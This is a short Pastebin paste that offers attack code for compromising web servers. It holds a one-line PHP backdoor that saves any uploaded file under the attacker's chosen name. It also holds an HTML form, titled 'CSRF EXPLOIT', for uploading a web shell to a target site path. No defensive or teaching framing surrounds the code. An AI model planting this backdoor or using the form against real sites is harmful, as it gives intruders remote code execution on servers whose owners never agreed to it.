Advertisement
Guest User

CSRF

a guest
Apr 18th, 2019
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.36 KB | None | 0 0
  1. CSRF Backdoor code:: <?php @copy(@$_FILES['x']['tmp_name'],@$_FILES['x']['name']); ?>
  2.  
  3.  
  4. CSRF Upload Script:::
  5.  
  6. <html>
  7. <title> CSRF EXPLOIT </title>
  8. <form action="site.com/path.php" method="post" enctype="multipart/form-data">
  9. Upload Your Shell Here : <input type="file" name="x"><br>
  10. <input type="submit" name="submit" value="Submit">
  11. </form>
  12. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement